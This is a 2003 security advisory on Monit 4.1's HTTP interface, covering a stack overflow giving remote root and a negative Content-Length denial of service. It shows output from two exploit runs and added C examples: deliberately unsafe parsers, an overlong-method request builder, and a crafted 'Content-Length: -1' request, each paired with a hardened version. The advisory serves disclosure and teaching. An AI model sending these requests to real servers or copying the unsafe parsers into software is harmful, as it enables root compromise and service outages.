From: e.legerov at s-quadra.com (S-Quadra Security Research)
Subject: Monit 4.1 HTTP interface multiple security vulnerabilities

         
            S-Quadra Advisory #2003-11-24

Topic: Monit 4.1 HTTP interface Multiple Security Vulnerabilities
Severity: High
Vendor URL: http://www.tildeslash.com/monit/
Advisory URL: http://www.s-quadra.com/advisories/Adv-20031124.txt
Release date: 22 Nov 2003

1. DESCRIPTION

Monit (http://www.tildeslash.com/monit/) is a utility for managing and
monitoring processes, files, directories and devices on a Unix system.
It conducts automatic maintenance and repair and can execute meaningful
causal actions in error situations.
Monit provides an HTTP(S) interface, so the monit server can be accessed
with a browser.

Several security vulnerabilities exist in the Monit HTTP interface; in
the worst case they allow a remote attacker to gain root access to the
system.

2. DETAILS

-- Vulnerability 1: Long HTTP method stack overflow

By supplying an overly long HTTP request method, an attacker can trigger
a stack overflow, which may lead to a remote root compromise.
Below is a successful run of 'xonya', a Monit <= 4.1 remote root exploit
(PoC):

$./xonya -t 3 -p 2812 192.168.3.12

Selected platform 3 ...
Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
Connected to 192.168.3.12:2812
Sending the request ...
Got a remote shell:

Linux 2.4.20 i686 unknown
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit
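The pattern behind this class of bug, as an added example that is not Monit's code and not part of the advisory: a request-line parser that reads the method into a fixed-size stack buffer with an unbounded sscanf("%s"), next to a bounded parser that measures the token first and rejects an overlong method. METHOD_MAX, the function names and the sample requests are assumptions for illustration; Monit's actual buffer size and parsing code are not shown on this page.

```c
/* Added example, not Monit's code: request-line parsing the unsafe way
 * and the bounded way.  METHOD_MAX, all function names and the sample
 * requests are assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define METHOD_MAX 16   /* assumed size of a fixed stack buffer */

enum { REQ_OK = 0, REQ_MALFORMED = -1, REQ_METHOD_TOO_LONG = -2 };

/* Unsafe pattern: "%s" carries no field width, so a method token of
 * METHOD_MAX or more bytes writes past the end of method[] on the stack.
 * Only call this with a well-formed request; an overlong method is the
 * overflow described above and must not be executed as a test. */
int parse_request_line_unsafe(const char *line, char *method_out, size_t out_len)
{
    char method[METHOD_MAX];
    char uri[256];
    char version[16];

    if (sscanf(line, "%s %s %s", method, uri, version) != 3)
        return REQ_MALFORMED;
    snprintf(method_out, out_len, "%s", method);
    return REQ_OK;
}

/* Bounded version: measure the token before copying, refuse anything that
 * does not fit in the caller's buffer, and restrict it to token characters. */
int parse_request_line_safe(const char *line, char *method_out, size_t out_len)
{
    const char *sp = strchr(line, ' ');
    if (sp == NULL)
        return REQ_MALFORMED;

    size_t mlen = (size_t)(sp - line);
    if (mlen == 0)
        return REQ_MALFORMED;
    if (mlen >= out_len)               /* keep room for the terminating NUL */
        return REQ_METHOD_TOO_LONG;

    for (size_t i = 0; i < mlen; i++) {
        unsigned char c = (unsigned char)line[i];
        if (c <= ' ' || c >= 0x7f)     /* not an HTTP token character */
            return REQ_MALFORMED;
    }
    memcpy(method_out, line, mlen);
    method_out[mlen] = '\0';
    return REQ_OK;
}

/* Build a request whose method is n bytes of 'A' followed by a normal
 * request-line tail: the shape an overflow PoC sends.  Returns the number
 * of bytes written, or 0 if buf is too small. */
size_t build_long_method_request(size_t n, char *buf, size_t buflen)
{
    static const char tail[] = " / HTTP/1.0\r\n\r\n";
    size_t tlen = sizeof tail - 1;

    if (n + tlen + 1 > buflen)
        return 0;
    memset(buf, 'A', n);
    memcpy(buf + n, tail, tlen + 1);   /* includes the NUL */
    return n + tlen;
}

int main(void)
{
    char method[METHOD_MAX];
    char req[4096];

    build_long_method_request(2000, req, sizeof req);
    printf("bounded parser, 2000-byte method: rc=%d\n",
           parse_request_line_safe(req, method, sizeof method));

    parse_request_line_safe("GET / HTTP/1.0\r\n", method, sizeof method);
    printf("bounded parser, GET: method=%s\n", method);

    parse_request_line_unsafe("GET / HTTP/1.0\r\n", method, sizeof method);
    printf("unsafe parser, GET: method=%s (never feed it req[])\n", method);
    return 0;
}
```

The bounded parser returns REQ_METHOD_TOO_LONG for the 2000-byte method and never touches the buffer; the unsafe parser compiles without complaint and behaves identically on well-formed input, which is why this bug survives casual testing.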

-- Vulnerability 2: Denial of Service via negative Content-Length field

By supplying a negative value in the Content-Length header, an attacker
can cause an xmalloc() failure and kill the Monit daemon.
Below is a successful run of 'donit', a Monit <= 4.1 remote Denial of
Service exploit (PoC):

$./donit -p 2812 192.168.3.12

Connecting to 192.168.3.12:2812 ...
Sending the request ...
Done.

$ nc -v 192.168.3.12 2812
lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused
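How a negative Content-Length can end in an allocator failure, as an added example that is not Monit's code: atoi() accepts "-1" without error, the resulting int becomes SIZE_MAX when it reaches an allocator that takes size_t, and an xmalloc()-style wrapper that aborts on allocation failure then takes the whole process with it. The int-to-size_t path, xmalloc_like(), find_header() and the constructed request are assumptions; the hardened parser shows the check a server should make instead.

```c
/* Added example, not Monit's code: how a negative Content-Length reaches
 * an allocator, and a parser that refuses it.  The int-to-size_t path,
 * xmalloc_like(), find_header() and the request bytes are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <errno.h>
#include <ctype.h>

enum { CL_OK = 0, CL_MISSING = -1, CL_INVALID = -2, CL_TOO_LARGE = -3 };

/* Unsafe pattern: atoi() returns -1 for "-1" and reports no error; when
 * that int is handed to an allocator taking size_t it becomes SIZE_MAX.
 * Returns the size the allocator would see instead of allocating it, so
 * it is safe to call with "-1". */
size_t content_length_unsafe(const char *value)
{
    int len = atoi(value);
    return (size_t)len;            /* -1 -> SIZE_MAX */
}

/* An xmalloc()-style wrapper (assumed shape): abort when malloc() fails.
 * Asked for SIZE_MAX bytes it terminates the process, which is the DoS. */
void *xmalloc_like(size_t n)
{
    void *p = malloc(n);
    if (p == NULL) {
        fprintf(stderr, "xmalloc: cannot allocate %zu bytes\n", n);
        abort();
    }
    return p;
}

/* Hardened: digits only (no sign, no whitespace), overflow-checked
 * conversion, and a policy maximum so the client cannot size the heap. */
int content_length_safe(const char *value, size_t max_body, size_t *out)
{
    if (value == NULL || *value == '\0')
        return CL_INVALID;
    for (const char *p = value; *p != '\0'; p++)
        if (!isdigit((unsigned char)*p))
            return CL_INVALID;     /* rejects "-1", "+1", " 1" */

    errno = 0;
    char *end;
    unsigned long long v = strtoull(value, &end, 10);
    if (errno == ERANGE || *end != '\0')
        return CL_INVALID;
    if (v > max_body)
        return CL_TOO_LARGE;
    *out = (size_t)v;
    return CL_OK;
}

/* Case-insensitive "Name:" match at the start of a header line. */
static int header_name_matches(const char *line, const char *name)
{
    size_t i;
    for (i = 0; name[i] != '\0'; i++)
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i]))
            return 0;
    return line[i] == ':';
}

/* Copy the value of the first header called name out of a raw request. */
int find_header(const char *request, const char *name, char *val, size_t val_len)
{
    const char *p = request;
    while ((p = strstr(p, "\r\n")) != NULL) {
        p += 2;
        if (!header_name_matches(p, name))
            continue;
        const char *v = p + strlen(name) + 1;
        while (*v == ' ' || *v == '\t')
            v++;
        const char *e = strstr(v, "\r\n");
        size_t len = e ? (size_t)(e - v) : strlen(v);
        if (len >= val_len)
            return CL_INVALID;
        memcpy(val, v, len);
        val[len] = '\0';
        return CL_OK;
    }
    return CL_MISSING;
}

/* Constructed request of the shape the negative-length DoS sends. */
static const char EVIL_REQUEST[] =
    "POST / HTTP/1.0\r\n"
    "Host: 192.168.3.12:2812\r\n"
    "Content-Length: -1\r\n"
    "\r\n";

int main(void)
{
    char value[32];
    size_t n = 0;

    find_header(EVIL_REQUEST, "Content-Length", value, sizeof value);
    printf("unsafe path would request %zu bytes\n", content_length_unsafe(value));
    printf("safe parser rc=%d\n", content_length_safe(value, 65536, &n));

    if (content_length_safe("42", 65536, &n) == CL_OK) {
        char *body = xmalloc_like(n);  /* only reached with a sane size */
        free(body);
    }
    return 0;
}
```

The policy maximum matters as much as the sign check: a client that cannot send "-1" can still send a very large positive length, and an abort-on-failure allocator turns either into a crash unless the server bounds the request before allocating.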

3. FIX INFORMATION

S-Quadra alerted the Monit development team to these issues on 21 November 2003.
Monit 4.1.1, which fixes the reported security vulnerabilities, is
available at http://www.tildeslash.com/monit/dist/monit-4.1.1.tar.gz.

4. CREDITS

Evgeny Legerov <e.legerov@...uadra.com> discovered these issues.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assessment, web application security, source code review and
third party product vulnerability assessment, forensic support and
reverse engineering.

Security is an art and our goal is to bring responsible and high quality
security service to the IT market, customized to meet the unique needs
of each individual client.

S-Quadra (pronounced es quadra) is not an acronym.
It's unique, creative and innovative - just like the security services
we bring to our clients.
